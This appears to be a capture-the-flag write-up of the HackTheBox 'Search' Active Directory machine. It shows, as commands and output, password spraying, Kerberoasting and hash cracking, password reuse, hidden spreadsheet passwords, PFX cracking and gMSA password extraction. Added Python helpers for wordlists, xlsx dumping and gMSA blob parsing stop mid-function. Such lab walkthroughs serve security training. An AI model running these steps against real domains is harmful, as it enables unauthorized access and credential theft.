HackTheBox - Search

Posted on Sat, Apr 30, 2022 | Tags: Active Directory, ADCS, Kerberoasting, Password re-use, gMSA Password, PSWA, Powershell

Info Card

Port Scanning

➤ nmap -T5 -sCV -p- 10.10.11.129 -Pn

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-17 13:27:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn:
|_  http/1.1
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
| tls-alpn:
|_  http/1.1
|_ssl-date: 2022-04-17T13:28:45+00:00; -1h43m08s from scanner time.
|_http-title: Site doesn't have a title.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  tcpwrapped
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  tcpwrapped
49707/tcp open  tcpwrapped
49710/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  tcpwrapped
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -1h43m08s, deviation: 0s, median: -1h43m08s
| smb2-time:
|   date: 2022-04-17T13:28:09
|_  start_date: N/A

Web enumeration, information disclosure

We can enumerate files and directories on the web server.

There is a /staff directory, but unfortunately we have no access to it (it answers 403 without a client certificate, which becomes relevant later).

There is an image with text on it on the web server.

Let's take a closer look at /images/slide_2.jpg.

Hope Sharp's password is disclosed: IsolationIsKey?

Except that, obviously, the username is not 'Hope Sharp':

➤ cme ldap 10.10.11.129 -d search.htb -u 'Hope Sharp' -p 'IsolationIsKey?'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope Sharp:IsolationIsKey?

Generate custom wordlist + Password Spraying

We can try generating a custom list of usernames from the name Hope Sharp:

cat user.lst
Hope Sharp
Sharp Hope
HopeSharp
HopeSharp2021
HopeSharp2022
h.sharp
sharp.h
hope
sharp
Hope
Sharp
hope.s
Hope.Sharp
hope.sharp
h.Sharp
Hope.S
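Building such a list by hand does not scale, and part of the list above is wasted: Windows logon names are matched case-insensitively, so Hope.Sharp and hope.sharp are the same guess as far as the lockout counter is concerned. The following Python script is an added example, not part of the original write-up: it generates the common sAMAccountName conventions from a full name (the FORMATS list and the helper names are my own choices), lowercases and de-duplicates them, and optionally appends year suffixes. Its output can be written to a file and fed to `cme ... -u user.lst`.

```python
import re

# Common AD sAMAccountName conventions. f/l = first/last name, fi/li = initials.
# Order matters: the most frequent conventions come first so a spray hits early.
FORMATS = (
    "{f}.{l}", "{l}.{f}", "{f}{l}", "{l}{f}",
    "{fi}.{l}", "{fi}{l}", "{f}.{li}", "{f}{li}",
    "{l}.{fi}", "{l}{fi}", "{f}_{l}", "{f}-{l}",
    "{f}", "{l}",
)


def _normalise(part: str) -> str:
    # Logon names are case-insensitive, so everything is lowercased; punctuation
    # inside a name part is dropped ("O'Brien" -> "obrien", "Mary-Ann" -> "maryann").
    return re.sub(r"[^a-z0-9]", "", part.lower())


def generate_usernames(full_name: str, suffixes=()) -> list[str]:
    """Return de-duplicated candidate logon names for a 'First [Middle] Last' string.

    suffixes: optional values appended to every base candidate (e.g. 2021, 2022),
    mirroring the HopeSharp2021-style guesses in the hand-made list.
    """
    parts = [p for p in (_normalise(p) for p in full_name.split()) if p]
    if len(parts) < 2:
        raise ValueError("need at least a first and a last name")
    first, last = parts[0], parts[-1]  # middle names are ignored
    ctx = {"f": first, "l": last, "fi": first[0], "li": last[0]}
    seen = {}  # dict preserves insertion order and de-duplicates
    for fmt in FORMATS:
        base = fmt.format(**ctx)
        for suffix in ("",) + tuple(str(s) for s in suffixes):
            seen.setdefault(base + suffix, None)
    return list(seen)


def write_wordlist(full_name: str, path: str, suffixes=()) -> int:
    """Write one candidate per line (no trailing blank line, which would make
    cme try an empty username) and return the number written."""
    names = generate_usernames(full_name, suffixes)
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(names))
    return len(names)


if __name__ == "__main__":
    for name in generate_usernames("Hope Sharp", suffixes=(2021, 2022)):
        print(name)
```

The empty-username line at the end of the page's own spray output (`search.htb\:IsolationIsKey?`) is exactly the artefact the writer avoids by not emitting a trailing newline.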

Let's password spray with this hand-built user list:

➤ cme ldap 10.10.11.129 -d search.htb -u user.lst -p 'IsolationIsKey?' --continue-on-success

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sharp Hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp2021:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\HopeSharp2022:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\h.sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp.h:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hope:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.s:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\h.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Hope.S:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\:IsolationIsKey?

We have compromised a domain account: search.htb\Hope.Sharp:IsolationIsKey? (Hope.Sharp and hope.sharp both succeed because logon names are matched case-insensitively.)

We can now attempt several kinds of attacks.

Kerberoasting

➤ net time -S 10.10.11.129
Sun Apr 17 13:53:08 2022

➤ faketime '2022-04-17 13:55:00' cme ldap 10.10.11.129 -d search.htb -u Hope.Sharp -p 'IsolationIsKey?' --kerberoast krb5-tgs.txt
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP        10.10.11.129    389    RESEARCH         [*] Total of records returned 4
LDAP        10.10.11.129    389    RESEARCH         sAMAccountName: web_svc memberOf:  pwdLastSet: 2020-04-09 12:59:11.329031 lastLogon:<never>
LDAP        10.10.11.129    389    RESEARCH         $krb5tgs$23$*web_svc$SEARCH.HTB$RESEARCH/web_svc.search.htb~60001*$4c1cf7c79f35e86aa4cd7a7ae496fa27$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

We get a TGS for web_svc, which is a service account. The faketime wrapper compensates for the clock skew nmap reported (-1h43m): Kerberos rejects requests whose timestamp is more than five minutes off the KDC's clock. The $krb5tgs$23$ prefix shows the ticket was issued with RC4-HMAC (etype 23), which is cheap to crack, so we can try to crack the hash:

➤ john krb5-tgs.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=krb5tgs

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0,02% (ETA: 17:18:12) 0g/s 0p/s 0c/s 0C/s
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-17 15:41) 0.09033g/s 1038Kp/s 1038Kc/s 1038KC/s @4208891ncv..=123jacko
Use the "--show" option to display all of the cracked passwords reliably
Session completed

That worked: we recover the service account's password, web_svc:@3ONEmillionbaby

➤ cme ldap 10.10.11.129 -d search.htb -u 'web_svc' -p '@3ONEmillionbaby'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby

goldenPac.py reports the target as vulnerable to MS14-068 (the PAC forgery it implements), but this is not useful here: the ticket obtained for web_svc gives no access that the account did not already have, as no service is reachable with it. Note that goldenPac.py prints "found vulnerable" as soon as the DC answers the TGS-REQ carrying the forged PAC; a patched DC that simply ignores the bogus PAC still returns a ticket, so this check is prone to false positives.

faketime '2022-04-17 15:50:00' goldenPac.py -dc-ip 10.10.11.129 search.htb/web_svc:'@3ONEmillionbaby'@RESEARCH.SEARCH.HTB
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] User SID: S-1-5-21-271492789-1610487937-1871574529-1296
[*] Forest SID: S-1-5-21-271492789-1610487937-1871574529
[*] Attacking domain controller 10.10.11.129
[*] 10.10.11.129 found vulnerable!

Password re-use

With the user list retrieved over SMB, we can go further with our enumeration:

cat users.lst

abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan

We can look for users who reuse this password (without --continue-on-success, cme stops at the first hit):

➤ cme ldap 10.10.11.129 -d search.htb -u users.lst -p '@3ONEmillionbaby'

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby

edgar.jacobs has the same password as web_svc.

➤ cme smb 10.10.11.129 -d search.htb -u edgar.jacobs -p '@3ONEmillionbaby' --shares

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share           Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----           -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                          Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                              Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk        READ
SMB         10.10.11.129    445    RESEARCH         IPC$            READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON        READ            Logon server share
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         10.10.11.129    445    RESEARCH         SYSVOL          READ            Logon server share

We can log in to SMB with his credentials and look at his redirected home folder on RedirectedFolders$:

➤ smbclient.py htb.local/'edgar.jacobs':'@3ONEmillionbaby'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# use RedirectedFolders$
# cd edgar.jacobs
# ls
drw-rw-rw-          0  Thu Apr  9 20:04:11 2020 .
drw-rw-rw-          0  Thu Apr  9 20:04:11 2020 ..
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 Desktop
drw-rw-rw-          0  Mon Aug 10 10:02:17 2020 Documents
drw-rw-rw-          0  Mon Aug 10 10:02:17 2020 Downloads
# cd Desktop
# ls
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 .
drw-rw-rw-          0  Mon Aug 10 10:02:16 2020 ..
drw-rw-rw-          0  Thu Apr  9 20:05:29 2020 $RECYCLE.BIN
-rw-rw-rw-        282  Mon Aug 10 10:02:16 2020 desktop.ini
-rw-rw-rw-       1450  Thu Apr  9 20:05:03 2020 Microsoft Edge.lnk
-rw-rw-rw-      23130  Mon Aug 10 10:30:05 2020 Phishing_Attempt.xlsx
# mget Phishing_Attempt.xlsx

Sensitive Information Disclosure through excel binder

There is a file named Phishing_Attempt.xlsx, which is just an Excel workbook. We can open it with LibreOffice.

The file holds statistics on the number of passwords captured per year by phishing attacks; there is a second sheet worth looking at.

It contains information about other users. When I try to resize the cells to check whether any information is hidden, I'm blocked because the sheet is protected.

We can select everything by clicking the small square at the top left of the sheet.

Then copy and paste without formatting to see whether other information shows up:

firstname  lastname   password                            Username
Payton     Harmon     ;;36!cried!INDIA!year!50;;          Payton.Harmon
Cortez     Hickman    ..10-time-TALK-proud-66..           Cortez.Hickman
Bobby      Wolf       ??47^before^WORLD^surprise^91??     Bobby.Wolf
Margaret   Robinson   //51+mountain+DEAR+noise+83//       Margaret.Robinson
Scarlett   Parks      ++47|building|WARSAW|gave|60++      Scarlett.Parks
Eliezer    Jordan     !!05_goes_SEVEN_offer_83!!          Eliezer.Jordan
Hunter     Kirby      ~~27%when%VILLAGE%full%00~~         Hunter.Kirby
Sierra     Frye       $$49=wide=STRAIGHT=jordan=28$$18    Sierra.Frye
Annabelle  Wells      ==95~pass~QUIET~austria~77==        Annabelle.Wells
Eve        Galvan     //61!banker!FANCY!measure!25//      Eve.Galvan
Jeramiah   Fritz      ??40:student:MAYOR:been:66??        Jeramiah.Fritz
Abby       Gonzalez   &&75:major:RADIO:state:93&&         Abby.Gonzalez
Joy        Costa      **30*venus*BALL*office*42**         Joy.Costa
Vincent    Sutton     **24&moment&BRAZIL&members&66**     Vincent.Sutton

Which is the case: sheet protection only blocks editing in the UI, it does not hide cell contents from a copy, so we can see their passwords.

We can try spraying them to check whether the passwords are still valid (with --no-bruteforce cme pairs each user with the password on the same line of the other file):
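Sheet protection in OOXML is a flag in the worksheet XML, not encryption: the cell values sit in clear text inside the .xlsx zip whether or not a sheet is protected or a column is hidden. The script below is an added example, not code from the original post. It builds a small constructed workbook with a protected sheet and a hidden password column (the names and the password in it are made up), then reads the worksheet parts directly with the standard library and reports the protection flag, the hidden ranges and the cells that fall inside them, so no copy-paste or LibreOffice step is needed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
M = {"m": NS}


def col_index(ref: str) -> int:
    """'A1' -> 1, 'AB7' -> 28 (1-based column number of a cell reference)."""
    n = 0
    for ch in re.match(r"[A-Z]+", ref).group(0):
        n = n * 26 + (ord(ch) - 64)
    return n


def build_sample_xlsx() -> bytes:
    """Constructed sample workbook: one protected sheet whose column C is hidden.
    Only the parts the inspector reads are written; a real package also carries
    [Content_Types].xml and the .rels files. Cells use the sharedStrings table
    like Excel does. Column letters are generated for A..Z only."""
    rows = [
        ("firstname", "lastname", "password", "Username"),
        ("Jane", "Doe", "Hidden!Pass123", "Jane.Doe"),
    ]
    strings, sheet_rows = [], []
    for r, row in enumerate(rows, start=1):
        cells = []
        for c, value in enumerate(row):
            strings.append(value)
            cells.append(f'<c r="{chr(65 + c)}{r}" t="s"><v>{len(strings) - 1}</v></c>')
        sheet_rows.append(f'<row r="{r}">{"".join(cells)}</row>')
    shared = (f'<sst xmlns="{NS}" count="{len(strings)}" uniqueCount="{len(strings)}">'
              + "".join(f"<si><t>{escape(s)}</t></si>" for s in strings) + "</sst>")
    # hidden="1" on <col> hides the column; <sheetProtection> is what stops resizing
    # in the UI. Its legacy password attribute is a 16-bit hash (value constructed here).
    sheet = (f'<worksheet xmlns="{NS}">'
             '<cols><col min="3" max="3" width="0" hidden="1" customWidth="1"/></cols>'
             f'<sheetData>{"".join(sheet_rows)}</sheetData>'
             '<sheetProtection sheet="1" objects="1" scenarios="1" password="CA9C"/>'
             "</worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/sharedStrings.xml", shared)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def inspect_xlsx(data: bytes) -> dict:
    """Dump every cell of every worksheet straight from the OOXML parts and flag
    protection plus hidden rows/columns. Nothing here needs the sheet password."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        shared = []
        if "xl/sharedStrings.xml" in z.namelist():
            sst = ET.fromstring(z.read("xl/sharedStrings.xml"))
            shared = ["".join(t.text or "" for t in si.iter(f"{{{NS}}}t"))
                      for si in sst.findall("m:si", M)]
        report = {}
        for part in sorted(n for n in z.namelist() if n.startswith("xl/worksheets/sheet")):
            root = ET.fromstring(z.read(part))
            prot = root.find("m:sheetProtection", M)
            hidden_cols = [(int(c.get("min")), int(c.get("max")))
                           for c in root.findall("m:cols/m:col", M) if c.get("hidden") == "1"]
            hidden_rows = {int(r.get("r")) for r in root.findall("m:sheetData/m:row", M)
                           if r.get("hidden") == "1"}
            cells = {}
            for c in root.iter(f"{{{NS}}}c"):
                v = c.find("m:v", M)
                if c.get("t") == "s":            # shared string reference
                    value = shared[int(v.text)]
                elif c.get("t") == "inlineStr":  # string stored inline in the cell
                    value = "".join(t.text or "" for t in c.iter(f"{{{NS}}}t"))
                else:                            # number, bool, formula result
                    value = v.text if v is not None else ""
                cells[c.get("r")] = value
            hidden = {ref: val for ref, val in cells.items()
                      if int(re.search(r"\d+", ref).group(0)) in hidden_rows
                      or any(lo <= col_index(ref) <= hi for lo, hi in hidden_cols)}
            report[part] = {"protected": prot is not None,
                            "protection": dict(prot.attrib) if prot is not None else {},
                            "hidden_cols": hidden_cols, "hidden_rows": sorted(hidden_rows),
                            "cells": cells, "hidden_cells": hidden}
    return report


if __name__ == "__main__":
    for part, info in inspect_xlsx(build_sample_xlsx()).items():
        print(part, "protected:", info["protected"], "hidden cells:", info["hidden_cells"])
```

Pointing `inspect_xlsx` at the bytes of a downloaded workbook (`open("Phishing_Attempt.xlsx", "rb").read()`) lists the hidden cells directly; only password-encrypted workbooks (an encrypted OLE container rather than a plain zip) resist this.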

➤ cme ldap 10.10.11.129 -d search.htb -u offuser.lst -p offpass.txt --continue-on-success --no-bruteforce

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Payton.Harmon:;;36!cried!INDIA!year!50;;
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:..10-time-TALK-proud-66..
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Bobby.Wolf:??47^before^WORLD^surprise^91??
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83//
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eliezer.Jordan:!!05_goes_SEVEN_offer_83!!
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Hunter.Kirby:~~27%when%VILLAGE%full%00~~
LDAP        10.10.11.129    389    RESEARCH         [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Annabelle.Wells:==95~pass~QUIET~austria~77==
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Eve.Galvan://61!banker!FANCY!measure!25//
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Jeramiah.Fritz:??40:student:MAYOR:been:66??
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&&
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Joy.Costa:**30*venus*BALL*office*42**
LDAP        10.10.11.129    389    RESEARCH         [-] search.htb\Vincent.Sutton:**24&moment&BRAZIL&members&66**

We have pwned the user Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

Access on PSWA as Sierra.Frye with PFX file

We can access the shares with her credentials and retrieve the user flag:

smbclient.py htb.local/'Sierra.Frye':'$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# use RedirectedFolders$
# mget user.txt
[*] Downloading user.txt

In Sierra.Frye's directory we find a .pfx file that will let us access PSWA (PowerShell Web Access) on /staff:

smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 20:39:17 2020
  ..                                DHc        0  Mon Aug 10 20:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 15:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 20:39:17 2020

smb: \sierra.frye\Downloads\Backups\> mget staff.pfx

To do this we will import the PFX file into Firefox as a client certificate.

Crack PFX File

But first we need the import password of the PKCS#12 file. I'll use crackpkcs12 to try to crack it:

➤ crackpkcs12 -d $(locate rockyou.txt| tail -n1) staff.pfx

Dictionary attack - Starting 12 threads

*********************************************************
Dictionary attack - Thread 1 - Password found: misspissy
*********************************************************

Import certificate in Firefox

Great! We can import the pfx file into Firefox to use it as a client certificate:

We can now reach /staff with the certificate, and log in to PSWA with Sierra.Frye's credentials.

BloodHound enumeration

We can run a BloodHound collection with Sierra's creds:

bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129

The user we compromised (Sierra.Frye) is a member of the BIRMINGHAM-ITSEC group, which is itself a member of ITSEC.

ITSEC has ReadGMSAPassword over the BIR-ADFS-GMSA object.

BIR-ADFS-GMSA has GenericAll over the user Tristan.Davies.

Tristan.Davies is a member of Domain Admins.

Read gMSA Password

We can use gMSADumper to obtain the NT hash of BIR-ADFS-GMSA$ (it reads msDS-ManagedPassword over LDAP with Sierra's rights and hashes the current password):

➤ python3 gMSADumper.py -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

Create PS-Credential object with gMSA password

Import-Module ActiveDirectory   # Get-ADServiceAccount
Import-Module DSInternals        # ConvertFrom-ADManagedPasswordBlob
$gmsa = Get-ADServiceAccount -Identity BIR-ADFS-GMSA -Properties msDS-ManagedPassword # Read the LDAP attribute (only principals allowed to retrieve the managed password get it)
$mp = $gmsa.'msDS-ManagedPassword' # Raw MSDS-MANAGEDPASSWORD_BLOB
$securestring = ConvertFrom-ADManagedPasswordBlob $mp # Parse the blob into current/previous password SecureStrings
$cred = New-Object System.Management.Automation.PSCredential('SEARCH\BIR-ADFS-GMSA', $securestring.SecureCurrentPassword) # Create the PSCredential object
Reference: "Retrieving Cleartext GMSA Passwords from Active Directory" (DSInternals blog post describing ConvertFrom-ADManagedPasswordBlob).
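What gMSADumper and ConvertFrom-ADManagedPasswordBlob do with the msDS-ManagedPassword attribute is parse the MSDS-MANAGEDPASSWORD_BLOB structure (MS-ADTS 2.2.20) and, for the NT hash, run MD4 over the raw UTF-16LE bytes of the current password. The Python below is an added example, not code from gMSADumper or DSInternals: it builds a constructed blob (a real DC fills the current password with 256 random bytes), parses it, and derives the NT hash with a pure-Python MD4, because many OpenSSL builds no longer expose md4 through hashlib. The sample passwords and function names are mine.

```python
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 over the UTF-16LE password."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (function, additive constant, message-word order, shifts)
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rotl((a + func(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so 'a' is always the one updated
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash_from_utf16(password_utf16le: bytes) -> str:
    return md4(password_utf16le).hex()


def nt_hash(password: str) -> str:
    return nt_hash_from_utf16(password.encode("utf-16-le"))


def build_managed_password_blob(current: bytes, previous: bytes = b"") -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB for offline testing.
    Layout: Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2)
    PreviousPasswordOffset(2) QueryPasswordIntervalOffset(2)
    UnchangedPasswordIntervalOffset(2), then the null-terminated WCHAR strings,
    QWORD alignment padding and the two interval QWORDs."""
    header_len = 16
    cur = current + b"\x00\x00"
    prev = previous + b"\x00\x00" if previous else b""
    cur_off = header_len
    prev_off = cur_off + len(cur) if previous else 0
    used = header_len + len(cur) + len(prev)
    pad = (-used) % 8
    qpi_off = used + pad
    upi_off = qpi_off + 8
    total = upi_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, total, cur_off, prev_off, qpi_off, upi_off)
    return header + cur + prev + b"\x00" * pad + struct.pack("<QQ", 0, 0)


def parse_managed_password_blob(blob: bytes) -> dict:
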